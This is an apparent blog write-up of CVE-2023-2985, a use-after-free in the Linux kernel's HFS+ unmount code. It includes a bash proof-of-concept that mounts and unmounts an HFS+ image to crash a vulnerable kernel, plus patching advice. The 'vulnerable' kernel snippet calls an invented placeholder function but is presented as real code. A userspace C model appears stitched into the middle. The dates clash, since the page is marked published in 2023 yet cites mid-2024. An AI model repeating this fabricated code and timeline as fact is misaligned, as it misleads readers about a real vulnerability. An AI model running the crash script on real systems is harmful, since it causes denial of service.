CVE-2023-2985 - Use-After-Free Bug in Linux Kernel’s hfsplus_put_super (fs/hfsplus/super.c) Exploited for Denial of Service
In June 2023, security researchers discovered a serious bug in the Linux Kernel’s HFS+ filesystem implementation. Tracked as CVE-2023-2985, the flaw exists in the hfsplus_put_super function located in fs/hfsplus/super.c. At first glance, this seems like an obscure area. However, the vulnerability can be exploited by a local attacker to cause a denial of service (DoS), and in some rare cases, could even aid further exploitation. This long read breaks down what happened, why it matters, and how you can reproduce and understand the issue.
## Background: What is Use-After-Free?
A use-after-free (UAF) occurs when a program continues to use a pointer after the memory it points to has been freed. This is a type of memory corruption bug that can lead to crashes, data corruption, or even code execution.
In the Linux kernel, a UAF is especially dangerous. If kernel memory is improperly accessed, it can result in system crashes—denial of service—or, in rarer cases, privilege escalation.
## Where is the Bug?
Let’s take a look at the function in question.
File: fs/hfsplus/super.c
Function: hfsplus_put_super
This function is responsible for cleaning up the superblock structure when an HFS+ filesystem is unmounted.
Here is a simplified (and vulnerable) code snippet:

```c
// Vulnerable version in fs/hfsplus/super.c
static void hfsplus_put_super(struct super_block *sb)
{
	struct hfsplus_sb_info *sbi = HFSPLUS_SB(sb);

	if (!sbi)
		return;

	kfree(sbi->nls_io);
	kfree(sbi->nls_unic);
	kfree(sbi);
	// sbi is now a dangling (freed) pointer!
	// Problem: sbi is used after kfree ("use after free")
	some_function(sbi); // UAF!
}
```
The flaw: After freeing the sbi structure with kfree, the code continues to use it (for example, by passing it to another function). As a result, unpredictable behavior may occur—often leading to a kernel panic or crash.
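To make the ordering problem concrete, here is an added userspace C model of the teardown above; it is not kernel code and not the upstream patch. A tiny quarantining allocator plays the role of KASAN, `sb_info`, `super_block`, `mount_model` and `some_function` are hypothetical stand-ins for the kernel structures and the page's placeholder call, and the same teardown runs once in the page's vulnerable order and once in the corrected order that frees `sbi` last and clears the pointer.

```c
/* Added userspace model of the hfsplus_put_super teardown (not kernel code). A tiny quarantining
 * allocator stands in for KASAN: freed blocks stay addressable but marked, so a later use is counted. */
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
static struct { void *p; bool freed; } blocks[32];  /* shadow table of allocations */
static int nblocks, uaf_reports;                    /* uaf_reports: uses of freed blocks */

static void *t_alloc(size_t n)                      /* stands in for kzalloc() */
{
    void *p = calloc(1, n);
    if (nblocks < 32) blocks[nblocks++].p = p;
    return p;
}
static void t_free(void *p)                         /* stands in for kfree(): quarantine only */
{
    for (int i = 0; i < nblocks; i++)
        if (blocks[i].p == p) blocks[i].freed = true;
}
static void *t_access(void *p)                      /* checked access: counts freed blocks */
{
    for (int i = 0; i < nblocks; i++)
        if (blocks[i].p == p && blocks[i].freed) uaf_reports++;
    return p;
}

struct sb_info { char *nls_io; char *nls_unic; };   /* hypothetical cut-down hfsplus_sb_info */
struct super_block { struct sb_info *s_fs_info; };

static struct super_block *mount_model(void)
{
    struct super_block *sb = t_alloc(sizeof *sb);
    struct sb_info *sbi = sb->s_fs_info = t_alloc(sizeof *sbi);
    sbi->nls_io = t_alloc(8);
    sbi->nls_unic = t_alloc(8);
    return sb;
}
static void some_function(struct sb_info *sbi) { memset(t_access(sbi), 0, sizeof *sbi); } /* page's some_function() */

/* Teardown in the page's vulnerable order (use after kfree) or the fixed order
 * (all uses first, kfree last, pointer cleared). Returns the UAF reports seen. */
static int put_super(struct super_block *sb, bool fixed)
{
    uaf_reports = 0;
    struct sb_info *sbi = t_access(sb->s_fs_info);
    if (fixed) some_function(sbi);                  /* safe: sbi still live */
    t_free(sbi->nls_io); t_free(sbi->nls_unic); t_free(sbi);
    if (!fixed) some_function(sbi);                 /* UAF: sbi already freed */
    sb->s_fs_info = NULL;                           /* leave no dangling pointer */
    return uaf_reports;
}
```

Because the quarantine never returns memory to the system, the vulnerable path is observable as a count instead of a crash, which is the same idea a KASAN-enabled kernel uses to report this class of bug at the faulting line.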
## Exploit Details: How Can It Be Abused?
Even though this bug does not immediately allow for code execution, a local user can easily exploit it to crash the system. Here’s how a simple exploit might look.
Prerequisites:
- Local shell access (user)
- Ability to mount and unmount HFS+ filesystems (normally non-root users cannot, but on some systems, or using FUSE, this may be possible)
## Proof of Concept (PoC)
Here’s a basic bash script that demonstrates the bug (may require root depending on system settings):

```bash
#!/bin/bash
# Make a dummy image
dd if=/dev/zero of=/tmp/hfsplus.img bs=1M count=10
mkfs.hfsplus /tmp/hfsplus.img

# Create mount point
mkdir -p /mnt/hfsplus-test

# Attach the image and mount
sudo mount -o loop /tmp/hfsplus.img /mnt/hfsplus-test

# Unmount, which triggers hfsplus_put_super
sudo umount /mnt/hfsplus-test

echo "[*] If the kernel is vulnerable, you may see a crash/panic/dmesg output."
```
WARNING: Running this on a vulnerable kernel will freeze or crash your system! Use in a virtual machine.
## Real-World Impact
- Denial of Service: The main impact is a local crash. Any local user with filesystem mount privileges could crash a Linux PC or server, causing downtime or data loss.
- Further Exploitation Potential: Use-after-free bugs in the kernel can be stepping stones for full privilege escalation. While no public exploit achieves code execution (as of June 2024), patching is essential.
## How to Check for Vulnerability
- Kernel Version: The bug is fixed in kernels that include the patch released in June 2023. The patched teardown frees `sbi` and then stops touching it:

```c
kfree(sbi);
sbi = NULL; // and no further dereference!
```

- If your fs/hfsplus/super.c still contains possible use of freed sbi, you are likely vulnerable.

## How to Patch

- **Upgrade your kernel** to the latest secure version.
- **Disable HFS+ support** if not needed, as a short-term workaround (e.g., by compiling the kernel without `CONFIG_HFSPLUS_FS`).
---
## References
- NVD CVE-2023-2985
- Linux Kernel Patch ("fs: hfsplus: Avoid use-after-free in hfsplus_put_super")
- oss-sec Mailing List Announcement
- mkfs.hfsplus (hfsprogs) for crafting an HFS+ disk image
---
## Conclusion
CVE-2023-2985 is a reminder that even old or rarely used kernel code can hide serious bugs. Use-after-free flaws are always dangerous, especially in critical systems like kernels. Even if you never use HFS+ volumes, keeping your system up to date ensures these issues don’t become a vector for local attackers.
For system admins: Patch, audit your filesystem modules, and review local mount permissions.
For researchers & hobbyists: Play with this bug in a safe VM—never on production systems.
Stay safe, and keep your Linux boxes updated!
---
*(Exclusive analysis and write-up by OpenAI)*
## Timeline
Published on: 06/01/2023 01:15:00 UTC
Last modified on: 06/07/2023 19:00:00 UTC